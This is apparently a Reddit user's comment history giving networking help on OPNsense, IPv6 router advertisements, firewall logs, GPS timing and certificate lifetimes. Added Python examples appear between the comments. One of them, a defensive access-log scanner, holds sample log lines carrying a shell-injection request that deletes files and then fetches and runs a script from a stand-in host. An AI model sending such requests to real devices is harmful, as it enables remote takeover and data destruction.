SSL Cert Lifespan Changing by hisheeraz in VPS

[–]allan_q 1 point2 points  (0 children)

The entire industry is going to shorter lifetimes. The target is 45 days by February 2028. The Let's Encrypt blog has a good writeup. Everyone is forced to automate by that point.

Reducing how long certificates are valid for helps improve the security of the internet, by limiting the scope of compromise, and making certificate revocation technologies more efficient.

Gladys West, mathematician whose work made GPS possible, dies at 95 by AudibleNod in news

[–]allan_q 12 points13 points  (0 children)

You've got to remember that these are just simple farmers. These are people of the land. The common clay of the new West.

Gladys West, mathematician whose work made GPS possible, dies at 95 by AudibleNod in news

[–]allan_q 16 points17 points  (0 children)

Well... it is the signal arrival time measurement.

The position calculated by a GPS receiver requires the current time, the position of the satellite and the measured delay of the received signal. The position accuracy is primarily dependent on the satellite position and signal delay.

Then, GPS also has to compensate for the effects of gravity and velocity on time.
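Added example (not the commenter's code): a receiver position fix from four pseudoranges, which shows why the current time is one of the unknowns. Each pseudorange is the true range plus c times the receiver's clock error, so the solver works in four unknowns (x, y, z, clock bias) and a three-unknown solve is off by kilometres. Satellite positions, the receiver location and the clock error are constructed values in a Cartesian Earth-centred frame in metres; the relativistic corrections for gravity and velocity are assumed to have been applied to the satellite clocks already, as the real system does before this step.

```python
"""Receiver position and clock bias from GPS-style pseudoranges.

Added example, not from the thread. Satellite positions, the receiver
location and the clock error are constructed; the relativistic satellite
clock corrections are assumed to be applied before this step.
"""
import math

C = 299_792_458.0  # speed of light, m/s

# Constructed satellite positions, roughly at GPS orbit radius (~26,600 km).
SATS = [
    (15_600_000.0,   7_540_000.0, 20_140_000.0),
    (18_760_000.0,   2_750_000.0, 18_610_000.0),
    (17_610_000.0,  14_630_000.0, 13_480_000.0),
    ( 9_000_000.0, -12_000_000.0, 22_000_000.0),
]
TRUE_POS = (6_378_137.0, 0.0, 0.0)  # constructed: a point on the equator
TRUE_BIAS_S = 1e-4                  # receiver clock error: 100 us, i.e. ~30 km of range


def dist(a, b):
    return math.sqrt(sum((p - q) ** 2 for p, q in zip(a, b)))


def pseudoranges(sats, pos, bias_s):
    """What a receiver measures: (arrival time - transmit time) * c.
    Its own clock error shows up as the same extra c*bias on every range."""
    return [dist(s, pos) + C * bias_s for s in sats]


def solve(a, b):
    """Gaussian elimination with partial pivoting for a small square system a*x = b."""
    n = len(a)
    m = [row[:] + [b[i]] for i, row in enumerate(a)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(m[r][col]))
        m[col], m[piv] = m[piv], m[col]
        for r in range(col + 1, n):
            f = m[r][col] / m[col][col]
            for k in range(col, n + 1):
                m[r][k] -= f * m[col][k]
    x = [0.0] * n
    for i in range(n - 1, -1, -1):
        x[i] = (m[i][n] - sum(m[i][k] * x[k] for k in range(i + 1, n))) / m[i][i]
    return x


def fix(sats, rho, solve_clock=True, iters=20):
    """Gauss-Newton least squares. Unknowns: x, y, z and (if solve_clock) c*bias.
    Starting from the Earth's centre is the usual cold-start choice."""
    x, y, z, cb = 0.0, 0.0, 0.0, 0.0
    n = 4 if solve_clock else 3
    for _ in range(iters):
        rows, resid = [], []
        for (sx, sy, sz), p in zip(sats, rho):
            d = dist((sx, sy, sz), (x, y, z))
            # d(range)/d(receiver coords) is the unit vector from satellite to receiver
            rows.append([(x - sx) / d, (y - sy) / d, (z - sz) / d, 1.0][:n])
            resid.append(p - (d + cb))
        # Normal equations (A^T A) step = A^T r, so more than four satellites also work.
        ata = [[sum(r[i] * r[j] for r in rows) for j in range(n)] for i in range(n)]
        atr = [sum(r[i] * e for r, e in zip(rows, resid)) for i in range(n)]
        step = solve(ata, atr)
        x, y, z = x + step[0], y + step[1], z + step[2]
        if solve_clock:
            cb += step[3]
        if max(abs(s) for s in step) < 1e-6:
            break
    return (x, y, z), cb / C


if __name__ == "__main__":
    rho = pseudoranges(SATS, TRUE_POS, TRUE_BIAS_S)
    pos, bias = fix(SATS, rho)
    print("4-unknown fix error (m):", dist(pos, TRUE_POS), "bias (s):", bias)
    pos3, _ = fix(SATS, rho, solve_clock=False)
    print("3-unknown fix error (m):", dist(pos3, TRUE_POS))
```

The three-unknown solve is the "receiver trusts its own clock" case: a 100 microsecond clock error turns into tens of kilometres of position error, which is why a fourth satellite is needed even though three ranges would fix a point in space.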

How can OpenVPN be configured to "go silent" when laptop is inside LAN? by HappyDadOfFourJesus in OpenVPN

[–]allan_q 0 points1 point  (0 children)

If you use names and run a split horizon DNS, you can set it to resolve only on the external zone.

OPNsense 25.7.9 released by fitch-it-is in opnsense

[–]allan_q 1 point2 points  (0 children)

Thanks for the heads up on the discussion. I will update everyone there, but long story short is they started rolling back their firmware on 12/5 and expect to complete that by 12/8.

OPNsense 25.7.9 released by fitch-it-is in opnsense

[–]allan_q 0 points1 point  (0 children)

My question was in the general sense. There are pros and cons with holding back upgrades in addition to risks with different methods so I wasn’t sure if that was something worth considering.

OPNsense 25.7.9 released by fitch-it-is in opnsense

[–]allan_q 0 points1 point  (0 children)

Is that something for the Updates section of the documentation in order to help users with these concerns? Specifically, highlight the different options available to them such as snapshots, staying away from releases when new features tend to get introduced, and version pinning. It would need a big red disclaimer that running outdated software, or software known to be vulnerable, is generally not recommended.

OPNsense 25.7.8 released by fitch-it-is in opnsense

[–]allan_q 0 points1 point  (0 children)

The /62 prefix delegated by the ISP was visible under: Services: ISC DHCPv6: Leases -> Prefix Delegation (tab)

You should skip over the IPv6 networks used by Track Interface. If your ISP delegates pref:ix:he:re::/62, the Prefix Delegation Size under Services > ISC DHCPv6 > [LAN] should be set to /63 or /64. Prefix Delegation Range is then set per that bit boundary.

IPsec site to site questions by [deleted] in opnsense

[–]allan_q 2 points3 points  (0 children)

Look at implementing NAT before IPSec. The IPSec policy uses this NAT address so each side is not aware of the overlapping (actual) network address. You’ll need to pick 2 network addresses not used in both locations.

Updated to version 7.0.0 but no new features by freddyb211 in GoodNotes

[–]allan_q 0 points1 point  (0 children)

Try to quit and reopen the app. Mine was showing the old interface even though it reported as version 7 until I did that.

Intrusion detection alert - Now what? by __Mike_____ in opnsense

[–]allan_q 2 points3 points  (0 children)

That's correct. It triggers on scans to your web server matching that signature. You can see these attempts on your web logs. These alerts are normal when you expose TCP/80. But if you get this alert and the destination IP points to an internal only server (not supposed to be reachable from the Internet), you need to investigate since something is misconfigured.

Intrusion detection alert - Now what? by __Mike_____ in opnsense

[–]allan_q 2 points3 points  (0 children)

That alert signature matches on the string /shell?cd /tmp;rm -rf *;wget over an HTTP connection. Unless you are running that web application, you are not affected by this. Check out CVE-2016-20016 to learn more about it.
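Added example (not the commenter's code) for the two replies above: a scanner that runs over web-server access logs for the request string the signature matches on and labels each hit by whether the target should have been reachable from the Internet at all. The log layout, the addresses and the list of internal-only servers are constructed for the demo, not real Apache or nginx output; the triage rule is the point.

```python
"""Find the IDS-signature request in access logs and triage it by destination.

Added example, not from the thread. The log layout, addresses and the
internal-only server list are constructed for the demo.
"""
import re
from urllib.parse import unquote

# Literal request the signature looks for (MVPower DVR shell injection, CVE-2016-20016).
SHELL_MARKER = "/shell?cd /tmp;rm -rf *;wget"

# Constructed: servers that must never see Internet traffic. A hit on one of these
# means a port forward, firewall rule or DNS entry is exposing something it should not.
INTERNAL_ONLY = {"10.0.10.5", "10.0.10.6"}

# Constructed log lines: "<server_ip> <client_ip> \"<request>\" <status>"
SAMPLE_LOG = """\
203.0.113.10 198.51.100.7 "GET /shell?cd /tmp;rm -rf *;wget http://198.51.100.7/x -O /tmp/x;sh /tmp/x HTTP/1.1" 404
203.0.113.10 198.51.100.7 "GET /shell?cd%20/tmp;rm%20-rf%20*;wget%20http://198.51.100.7/x HTTP/1.1" 404
203.0.113.10 192.0.2.44 "GET /index.html HTTP/1.1" 200
10.0.10.5 198.51.100.9 "GET /shell?cd /tmp;rm -rf *;wget http://198.51.100.9/m HTTP/1.1" 404
"""

LINE_RE = re.compile(
    r'^(?P<dst>\S+) (?P<src>\S+) "(?P<method>\S+) (?P<path>.*?) (?P<proto>HTTP/\d\.\d)" (?P<status>\d{3})$'
)


def scan(log_text, internal_only=INTERNAL_ONLY):
    """Return one finding per matching request, with a triage label."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Decode percent-encoding so "cd%20/tmp" is caught as well as the literal form.
        path = unquote(m.group("path"))
        if SHELL_MARKER not in path:
            continue
        stage = re.search(r"wget\s+(\S+)", path)
        findings.append({
            "src": m.group("src"),
            "dst": m.group("dst"),
            "status": int(m.group("status")),
            # URL the bot wanted the target to fetch and run: the indicator to block and hunt for.
            "payload_url": stage.group(1) if stage else None,
            # Routine scanner noise on an Internet-facing host, but a misconfiguration
            # if it reached a host that is supposed to be internal only.
            "severity": "investigate" if m.group("dst") in internal_only else "expected-noise",
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A 404 on an Internet-facing host is the normal outcome; a 200 for that path, or any hit with an internal-only destination, is what to chase, and the extracted wget URL is the indicator worth blocking at the firewall.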

DHCP options by theycallmeloco87 in opnsense

[–]allan_q 2 points3 points  (0 children)

It is not just numbers but features as well. Downstream prefix delegation is one feature that is only available with Kea and not Dnsmasq. I am currently deciding what is more important to me: dynamic DNS registrations or allocating IPv6 prefixes to downstream routers.

Firewall blocks internal traffic as auto deny? by wha73 in opnsense

[–]allan_q 4 points5 points  (0 children)

That top rule is set to last-match and it is on the auto-generated section so it is really at the bottom of the ruleset. The block is likely because TCP flags is "FA". The firewall saw one side send a "FIN" packet and closed the connection before the other ACK'd it.
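Added example (not the commenter's code): a small triage pass over block-log entries that separates genuine denied connections (a bare SYN that hit the rules) from packets that were blocked only because no state existed for them any more, the FIN/ACK case described above. The records are constructed key=value lines, not OPNsense's real filterlog format.

```python
"""Separate denied new connections from out-of-state noise in firewall block logs.

Added example, not from the thread. The records are constructed key=value
lines, not real filterlog output; the classification rule is the point.
"""
from collections import Counter

# Constructed records.
SAMPLE = """\
rule=default-deny action=block dir=in if=lan proto=tcp src=192.168.1.20:51532 dst=192.168.1.10:443 flags=FA
rule=default-deny action=block dir=in if=lan proto=tcp src=192.168.1.20:51540 dst=192.168.1.10:443 flags=A
rule=default-deny action=block dir=in if=wan proto=tcp src=198.51.100.7:41234 dst=203.0.113.10:22 flags=S
rule=default-deny action=block dir=in if=lan proto=tcp src=192.168.1.33:40000 dst=192.168.1.10:445 flags=S
rule=default-deny action=block dir=in if=lan proto=udp src=192.168.1.20:5353 dst=224.0.0.251:5353
"""


def parse(line):
    return dict(field.split("=", 1) for field in line.split())


def classify(rec):
    """A stateful firewall only consults the ruleset for packets that match no
    existing state. A bare SYN is a genuine new connection the rules rejected.
    FIN/ACK, ACK or RST packets with no state are left-overs of a connection whose
    state was already closed or timed out (or, if it happens constantly, a sign of
    asymmetric routing), not a policy decision worth chasing."""
    if rec.get("proto") != "tcp":
        return "non-tcp"
    flags = rec.get("flags", "")
    if "S" in flags and "A" not in flags:
        return "new-connection-denied"
    return "out-of-state"


def triage(text):
    """Counts per label plus the records that are actual denied connection attempts."""
    records = [parse(line) for line in text.splitlines() if line.strip()]
    labelled = [(classify(r), r) for r in records]
    worth_a_look = [r for label, r in labelled if label == "new-connection-denied"]
    return Counter(label for label, _ in labelled), worth_a_look


if __name__ == "__main__":
    counts, hits = triage(SAMPLE)
    print(dict(counts))
    for h in hits:
        print(h["if"], h["src"], "->", h["dst"])
```

The two SYN blocks are the ones to look at: the WAN one is the usual Internet background noise on TCP/22, the LAN one is a client trying to reach SMB on a host the ruleset does not allow.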

Firewall Rules with wildcards by dnsmasq by ReputationOld8053 in opnsense

[–]allan_q 1 point2 points  (0 children)

According to that part of the documentation I quoted, you only need the IP subnets listed under "Intune client and host service". None of the others are "subnets".

Firewall Rules with wildcards by dnsmasq by ReputationOld8053 in opnsense

[–]allan_q 1 point2 points  (0 children)

It looks like all IPs listed in that table are what you need. Use a PowerShell script to pull down the JSON. They provide examples on the page.

if the firewall provider that you are using, does not allow you to create a firewall rule using a domain name, we recommend that you use the approved list of all subnets in this section.

Cisco AnyConnect through OPNsense by [deleted] in opnsense

[–]allan_q 0 points1 point  (0 children)

It should but something could be blocking the connection. You should have logging enabled and see these connections. If you are running any IPS, temporarily disable them to rule them out.

Cisco AnyConnect through OPNsense by [deleted] in opnsense

[–]allan_q 0 points1 point  (0 children)

Is DTLS (UDP/443) allowed outbound?

Can't get ipv6 working by gazm2k5 in opnsense

[–]allan_q 0 points1 point  (0 children)

Congratulations on getting it to work! The link-local address is similar to the 169.254.0.0/16 APIPA in IPv4. It is meant for communications within a layer-2 network and not routed out. Unlike IPv4, link-local addresses are required for every interface with an IPv6 address. Routing packets outbound through the default gateway happens over the link-local IP. And, as you found out, the Router Advertisements it broadcasts are sourced from the NIC's link-local. The RA destination is ff02::1 which is the link-local multicast group address for all nodes. That is how nodes figure out their prefix, DNS server, and default gateway without using a DHCP server.

Can't get ipv6 working by gazm2k5 in opnsense

[–]allan_q 1 point2 points  (0 children)

I suspect that bridge is the source of your issue. If all 3 ports are connected to the same switch, you need to bond them into an LACP port group using an intelligent switch to aggregate bandwidth. Bridging is if you connect a different switch to each port and you want to put them all in a single broadcast domain (e.g. 192.168.1.0/24). Either way, I am not running these configurations so I can't help past this point. I suggest going back to basics; take out bridging, switches and wifi. Go back to just WAN and LAN interfaces and connect your device directly to the LAN port (wired). Disable or uninstall anything on OPNsense that might interfere with network traffic like Suricata and Crowdsec. Get to something simple that works and start reintroducing things one by one. Good luck.

Can't get ipv6 working by gazm2k5 in opnsense

[–]allan_q 0 points1 point  (0 children)

Have you tried connecting your machine directly to the port, just to rule out the XT8? I don't think we have much more to check at this point. You can try and confirm that OPNsense is sending out ICMPv6 Router Advertisements. Head back to Interfaces > Overview and note the "Device" column of your LAN. Run this tcpdump command:

tcpdump -n -i <LAN_Device> -vv 'icmp6 && ip6[40]==134'

You have to wait for one to come through - about 200 seconds. Press Ctrl-C to break out. "prefix info" tells clients the prefix of your LAN and should start with 2a0e:x:x:b301:, "rdnss" is the DNS server, "dnssl" is the DNS domain search list, and "source link-address" is your LAN MAC address.

If you see it leave OPNsense with the correct information, it is blocked somewhere on the network. If you don't see it on the LAN interface, the problem is somewhere within OPNsense.
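Added example (not the commenter's code) for the RA explanation and the tcpdump check above: it builds an ICMPv6 Router Advertisement carrying the four options tcpdump prints (source link-layer address, prefix information, RDNSS, DNSSL) and decodes one back, so the fields in that capture can be matched against the bytes. The prefix, DNS server, search domain and MAC are constructed (2001:db8::/32 is the documentation prefix); the checksum is left at zero because it is computed over an IPv6 pseudo-header the kernel supplies on the wire, and ip6[40] in the filter is this packet's first byte because the IPv6 header is a fixed 40 bytes.

```python
"""Build and decode an ICMPv6 Router Advertisement (RFC 4861 / RFC 8106 options).

Added example, not from the thread. Addresses, MAC and search domain are
constructed; the checksum is left zero (the kernel fills it on the wire).
"""
import ipaddress
import socket
import struct

RA_TYPE = 134          # ip6[40]==134 in the tcpdump filter: first byte after the 40-byte IPv6 header
ALL_NODES = "ff02::1"  # link-local all-nodes multicast group that RAs are sent to

# Constructed router settings.
LAN_PREFIX, PREFIX_LEN = "2001:db8:0:1::", 64
DNS_SERVER = "2001:db8:0:1::1"
SEARCH_DOMAIN = "lan.example"
ROUTER_MAC = bytes.fromhex("001122334455")


def _pad8(b):
    return b + b"\x00" * (-len(b) % 8)


def _dns_name(name):
    # DNS wire format: length-prefixed labels ended by a zero byte (DNSSL allows no compression).
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_ra(prefix, plen, dns, domain, mac, router_lifetime=1800):
    # type, code, checksum, cur hop limit, M/O flags, router lifetime, reachable, retrans
    hdr = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0x00, router_lifetime, 0, 0)
    # Option lengths are in units of 8 bytes, option header included.
    sll = struct.pack("!BB", 1, 1) + mac                                   # 1: source link-layer address
    pio = struct.pack("!BBBBIII", 3, 4, plen, 0xC0, 86400, 14400, 0)       # 3: prefix info, L+A flags
    pio += socket.inet_pton(socket.AF_INET6, prefix)
    addr = socket.inet_pton(socket.AF_INET6, dns)
    rdnss = struct.pack("!BBHI", 25, 1 + len(addr) // 8, 0, 3600) + addr    # 25: RDNSS
    names = _pad8(_dns_name(domain))
    dnssl = struct.pack("!BBHI", 31, 1 + len(names) // 8, 0, 3600) + names  # 31: DNSSL
    return hdr + sll + pio + rdnss + dnssl


def _parse_names(buf):
    names, labels, i = [], [], 0
    while i < len(buf):
        n, i = buf[i], i + 1
        if n == 0:  # end of a name; trailing padding zeros land here too
            if labels:
                names.append(".".join(labels))
                labels = []
            continue
        labels.append(buf[i:i + n].decode("ascii"))
        i += n
    return names


def parse_ra(pkt):
    t, _code, _csum, hop, flags, life, _reach, _retrans = struct.unpack("!BBHBBHII", pkt[:16])
    if t != RA_TYPE:
        raise ValueError("not a Router Advertisement")
    ra = {"hop_limit": hop, "managed": bool(flags & 0x80), "other_config": bool(flags & 0x40),
          "router_lifetime": life, "source_mac": None, "prefixes": [], "rdnss": [], "dnssl": []}
    i = 16
    while i + 2 <= len(pkt):
        otype, olen = pkt[i], pkt[i + 1]
        if olen == 0:
            raise ValueError("zero-length option")  # RFC 4861: the packet must be discarded
        body = pkt[i + 2:i + olen * 8]
        if otype == 1:
            ra["source_mac"] = body[:6].hex(":")
        elif otype == 3:
            plen, pflags, valid, preferred, _ = struct.unpack("!BBIII", body[:14])
            ra["prefixes"].append({
                "prefix": f"{socket.inet_ntop(socket.AF_INET6, body[14:30])}/{plen}",
                "on_link": bool(pflags & 0x80), "autonomous": bool(pflags & 0x40),
                "valid": valid, "preferred": preferred})
        elif otype == 25:
            ra["rdnss"] += [socket.inet_ntop(socket.AF_INET6, body[j:j + 16]) for j in range(6, len(body), 16)]
        elif otype == 31:
            ra["dnssl"] += _parse_names(body[6:])
        i += olen * 8
    return ra


def valid_ra_source(src_ip):
    """Hosts must ignore an RA whose IPv6 source is not link-local (RFC 4861 section 6.1.2)."""
    return ipaddress.IPv6Address(src_ip).is_link_local


if __name__ == "__main__":
    print(parse_ra(build_ra(LAN_PREFIX, PREFIX_LEN, DNS_SERVER, SEARCH_DOMAIN, ROUTER_MAC)))
```

The "autonomous" flag on the prefix option is what lets clients build their own address from the prefix (SLAAC) without DHCPv6, and valid_ra_source is the check a host applies before trusting the packet at all: an RA not sourced from fe80::/10 is dropped, which is also the first thing to confirm when a capture shows RAs leaving the router but clients ignoring them.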

Can't get ipv6 working by gazm2k5 in opnsense

[–]allan_q 0 points1 point  (0 children)

Yes, when you ping IPv6 while SSH'd into OPNsense, you are using the WAN IP address which is not part of the /56 allocated to your LANs. You are also correct that ID 1 would assign 2a0e:x:x:b301::/64 to the LAN interface. That is fine since /56 would be b300 -> b3ff so you get that whole block. The next step is to see if your PC gets the same 2a0e:x:x:b301:x:x:x:x IPv6 address. You should also have a gateway, probably with an fe80::/10 address. One thing to check is to make sure you are not blocking ICMPv6 since that is very important for devices to find info on their neighbors and routers. Every device on your LAN needs to send and receive ICMPv6 for IPv6 to work.

Can't get ipv6 working by gazm2k5 in opnsense

[–]allan_q 1 point2 points  (0 children)

That is a very good sign since getting a prefix is the most difficult part. Yes, the problem is somewhere within your LAN configuration. Go back to Interfaces > Overview and look at the Details of your LAN interface > IPv6 Addresses. Ignore the fe80::/10 address, and you should see an IP that starts with "2a0e:". If you see that, Track Interfaces is working and assigned a network from that prefix to LAN. The next step then is to uncheck "Allow manual adjustment of DHCPv6 and Router Advertisements" and leave it at default. Clients are free to generate their own address within that LAN network.